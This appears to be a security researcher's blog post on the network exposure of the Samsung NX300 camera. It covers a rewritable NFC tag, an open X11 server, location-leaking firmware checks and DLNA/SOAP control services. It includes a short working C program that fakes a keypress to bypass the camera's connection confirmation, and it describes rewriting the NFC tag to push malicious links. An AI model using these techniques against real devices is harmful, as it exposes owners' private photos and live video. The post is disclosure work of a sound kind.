The Samsung NX300 smart camera is a middle-class mirrorless camera with NFC and WiFi connectivity. You can connect it with your local WiFi network to upload directly to cloud services, share pictures via DLNA or obtain remote access from your smartphone. For the latter, the camera provides the Remote Viewfinder and MobileLink modes where it creates an unencrypted access point with wide-open access to its X server and any data which you would expect only to be available to your smartphone.

Because hardware engineers suck at software security, nothing else was to be expected. Nevertheless, the following will show how badly they suck, if only for documentation purposes.

This post is only covering the network connectivity of the NX300. Read the follow-up posts for getting a root shell and adding features to the camera. The smartphone app deserves some attention as well. Feel free to do your own research and post it to the project wiki.

The findings in this blog posts are based on firmware version 1.31.

NFC Tag

The NFC "connectivity" is an NTAG203 created by NXP, which is pre-programmed with an NDEF message to download and launch the (horribly designed) Samsung SMART CAMERA App from Google Play, and to inform the app about the access point name provided by this individual camera:

Type: MIME: application/com.samsungimaging.connectionmanager Payload: AP_SSC_NX300_0-XX:XX:XX Type: EXTERNAL: urn:nfc:ext:android.com:pkg Payload: com.samsungimaging.connectionmanager

The tag is writable, so a malicious user can easily "hack" your camera by rewriting its tag to download some evil app, or to open nasty links in your web browser, merely by touching it with an NFC-enabled smartphone. This was confirmed by replacing the tag content with an URL.

The deployed tag supports permanent write-locking, so if you know a prankster nerd, you might end up with a camera stuck redirecting you to a hardcore porn site.

WiFi Networking

You can configure the NX300 to enter your WiFi network, it will behave like a regular client with some open services, like DLNA. Let us see what exactly is offered by performing a port scan:

megavolt:~# nmap -sS -O nx300 Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-21 22:37 CET Nmap scan report for nx300.local (192.168.0.147) Host is up (0.0089s latency). Not shown: 999 closed ports PORT STATE SERVICE 6000/tcp open X11 MAC Address: A0:21:95:**:**:** (Unknown) No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).

This scan was performed while the "E-Mail" application was open. In AllShare Play and MobileLink modes, 7676/tcp is opened in addition. Further, in Remote Viewfinder mode, the camera also opens 7679/tcp .

X Server

Wait, what? X11 as an open service? Could that be true? For sure it is access-locked via TCP to prevent abuse?

georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts -misc-fixed-medium-r-semicondensed--0-0-75-75-c-0-iso8859-1 -misc-fixed-medium-r-semicondensed--13-100-100-100-c-60-iso8859-1 -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1 6x13 cursor fixed georg@megavolt:~$ DISPLAY=nx300:0 xrandr Screen 0: minimum 320 x 200, current 480 x 800, maximum 4480 x 4096 LVDS1 connected 480x800+0+0 (normal left inverted right x axis y axis) 480mm x 800mm 480x800 60.0*+ HDMI1 disconnected (normal left inverted right x axis y axis) georg@megavolt:~$ for i in $(xdotool search '.') ; do xdotool getwindowname $i ; done Defaulting to search window name, class, and classname Enlightenment Background acdaemon,key,receiver Enlightenment Black Zone (0) Enlightenment Frame di-camera-app-nx300 Enlightenment Frame smart-wifi-app-nx300

Nope! This is really an unprotected X server! It is running Enlightenment! And we can even run apps on it! But besides displaying stuff on the camera the fun seems very limited:

X11 Key Bindings

A short investigation using xev outlines that the physical keys on the camera body are bound to X11 key events as follows:

On/Off XF86PowerOff (only when turning off) Scroll Wheel XF86ScrollUp / XF86ScrollDown Direct Link XF86Mail Mode Wheel F1 .. F10 Video Rec XF86WebCam +/- XF86Reload Menu Menu Fn XF86HomePage Keypad KP_Left .. KP_Down , KP_Enter Play XF86Tools Delete KP_Delete

When the camera goes online, it performs a firmware version check. First, it retrieves http://gld.samsungosp.com :

Request:

GET / HTTP/1.1 Content-Type: text/xml;charset=utf-8 Accept: application/x-shockwave-flash, application/vnd.ms-excel, */* Accept-Language: ko User-Agent: Mozilla/4.0 Host: gld.samsungosp.com

Response:

HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: text/html Date: Thu, 28 Nov 2013 16:23:48 GMT Last-Modified: Mon, 31 Dec 2012 02:23:18 GMT Server: nginx/0.7.65 Content-Length: 7 Connection: keep-alive 200 OK

This really looks like a no-op. But maybe this is a backdoor to allow for remote code execution? Who knows...

Then, a query to http://ipv4.connman.net/online/status.html returns an empty document, but has your location data (apparently obtained from the IP) in the headers:

X-ConnMan-Status: online X-ConnMan-Client-IP: ###.###.##.### X-ConnMan-Client-Address: ###.###.##.### X-ConnMan-Client-Continent: EU X-ConnMan-Client-Country: DE X-ConnMan-Client-Region: ## X-ConnMan-Client-City: ###### (my actual city) X-ConnMan-Client-Latitude: ##.166698 X-ConnMan-Client-Longitude: ##.666700 X-ConnMan-Client-Timezone: Europe/Berlin

Wow! They know where I live! At least they do not transmit any unique identifiers with the query.

As the last step, the camera is asking for firmware versions and gets redirected to an XML document with the ChangeLog.

Known versions so far:

WiFi Access Point: UPnP/DLNA

Two of the on-camera apps (MobileLink, Remote Viewfinder) open an unencrypted access point named AP_SSC_NX300_0-XX:XX:XX (where XX:XX:XX is the device part of its MAC address). Fortunately, Samsung's engineers were smart and added a user confirmation dialog to the camera UI, to prevent remote abuse:

Unfortunately, this dialog is running on a wide-open X server, so all we need is to fake an KP_Return event (based on an example by bharathisubramanian), and we can connect with whichever client, stream a live video or download all the private pictures from the SD card, depending on the enabled mode:

#include <X11/Xlib.h> #include <X11/Intrinsic.h> #include <X11/extensions/XTest.h> #include <unistd.h> /* Send Fake Key Event */ static void SendKey ( Display * disp , KeySym keysym , KeySym modsym ){ KeyCode keycode = 0 , modcode = 0 ; keycode = XKeysymToKeycode ( disp , keysym ); if ( keycode == 0 ) return ; XTestGrabControl ( disp , True ); /* Generate modkey press */ if ( modsym != 0 ) { modcode = XKeysymToKeycode ( disp , modsym ); XTestFakeKeyEvent ( disp , modcode , True , 0 ); } /* Generate regular key press and release */ XTestFakeKeyEvent ( disp , keycode , True , 0 ); XTestFakeKeyEvent ( disp , keycode , False , 0 ); /* Generate modkey release */ if ( modsym != 0 ) XTestFakeKeyEvent ( disp , modcode , False , 0 ); XSync ( disp , False ); XTestGrabControl ( disp , False ); } /* Main Function */ int main (){ Display * disp = XOpenDisplay ( NULL ); sleep ( 1 ); /* Send Return */ SendKey ( disp , XK_Return , 0 ); }

DLNA Service: Remote Viewfinder

The DLNA service is exposing some camera features, which are queried and used by the Android app. The device's friendly name is [Camera]NX300 , as can be queried via HTTP from http://nx300:7676/smp_2_ :

<dlna:X_DLNADOC> DMS- 1.50 </dlna:X_DLNADOC> <deviceType> urn:schemas-upnp-org:device:MediaServer: 1 </deviceType> <friendlyName> [Camera]NX300 </friendlyName> <manufacturer> Samsung Electronics </manufacturer> <manufacturerURL> http://www.samsung.com </manufacturerURL> <modelDescription> Samsung Camera DMS </modelDescription> <modelName> SP1 </modelName> <modelNumber> 1.0 </modelNumber> <modelURL> http://www.samsung.com </modelURL> <serialNumber> 20081113 Folderview </serialNumber> <sec:X_ProductCap> smi,getMediaInfo.sec,getCaptionInfo.sec </sec:X_ProductCap> <UDN> uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX </UDN> <serviceList> <service> <serviceType> urn:schemas-upnp-org:service:ContentDirectory: 1 </serviceType> <serviceId> urn:upnp-org:serviceId:ContentDirectory </serviceId> <controlURL> /smp_4_ </controlURL> <eventSubURL> /smp_5_ </eventSubURL> <SCPDURL> /smp_3_ </SCPDURL> </service> <service> <serviceType> urn:schemas-upnp-org:service:ConnectionManager: 1 </serviceType> <serviceId> urn:upnp-org:serviceId:ConnectionManager </serviceId> <controlURL> /smp_7_ </controlURL> <eventSubURL> /smp_8_ </eventSubURL> <SCPDURL> /smp_6_ </SCPDURL> </service> </serviceList> <sec:deviceID> </sec:deviceID> </device>

Additional SOAP services are provided for changing settings like focus and flash ( /smp_3_ ):

Function Arguments Result GetSystemUpdateID Id GetSearchCapabilities SearchCaps GetSortCapabilities SortCaps Browse ObjectID BrowseFlag Filter

StartingIndex RequestedCount SortCriteria Result NumberReturned

TotalMatches UpdateID GetIP GETIPRESULT GetInfomation GETINFORMATIONRESULT StreamUrl SetResolution RESOLUTION ZoomIN CURRENTZOOM ZoomOUT CURRENTZOOM MULTIAF AFSTATUS AF AFSTATUS setTouchAFOption TOUCH_AF_OPTION SET_OPTION_RESULT touchAF AFPOSITION TOUCHAF_RESULT AFRELEASE AFRELEASERESULT ReleaseSelfTimer RELEASETIMER Shot AFSHOTRESULT ShotWithGPS GPSINFO AFSHOTRESULT SetLED LEDTIME SetFlash FLASHMODE SetStreamQuality Quality

Another service is available for picture / video streaming ( /smp_4_ ):

<?xml version = "1.0" encoding = "utf-8" ?> <s:Envelope xmlns: s = "http://schemas.xmlsoap.org/soap/envelope/" s: encodingStyle = "http://schemas.xmlsoap.org/soap/encoding/" > <s:Body> <u:GetInfomationResponse xmlns: u = "urn:schemas-upnp-org:service:ContentDirectory:1" > <GETINFORMATIONRESULT> <Resolutions> <Resolution><Width> 5472 </Width><Height> 3648 </Height></Resolution> <Resolution><Width> 1920 </Width><Height> 1080 </Height></Resolution> </Resolutions> <Flash> <Supports><Support> off </Support><Support> auto </Support></Supports> <Defaultflash> auto </Defaultflash> </Flash> <FlashDisplay> <Supports><Support> off </Support><Support> auto </Support></Supports> <CurrentFlashDisplay> off </CurrentFlashDisplay> </FlashDisplay> <ZoomInfo> <DefaultZoom> 0 </DefaultZoom> <MaxZoom> 1 </MaxZoom> </ZoomInfo> <AVAILSHOTS> 289 </AVAILSHOTS> <ROTATION> 1 </ROTATION> <StreamQuality> <Quality><Option> high </Option><Option> low </Option></Quality> <Default> high </Default> </StreamQuality> </GETINFORMATIONRESULT> <StreamUrl> <QualityHighUrl> http:// 192.168.102.1 : 7679 /livestream.avi </QualityHighUrl> <QualityLowUrl> http:// 192.168.102.1 : 7679 /qvga_livestream.avi </QualityLowUrl> </StreamUrl> </u:GetInfomationResponse> </s:Body> </s:Envelope>

After triggering the right commands, a live video stream should be available from http://nx300:7679/livestream.avi . However, a brief attempt to get some video with wget or mplayer failed.

Firmware "Source Code"

The "source code" package provided on Samsung's OSS Release Center is 834 MBytes compressed and mainly contains three copies of the rootfs image (400-500MB each), and then some scripts. The actual build root is hidden under the second paper sheet link in the "Announcements" column.

Also, there are Obamapics in TIZEN/project/NX300/image/rootdir/opt/sd0/DCIM/100PHOTO .

The project is built on an ancient version of Tizen, on which I am no expert. Somebody else needs to take this stuff apart, make a proper build environment, or port OpenWRT to it.

Comments on HN

Full series: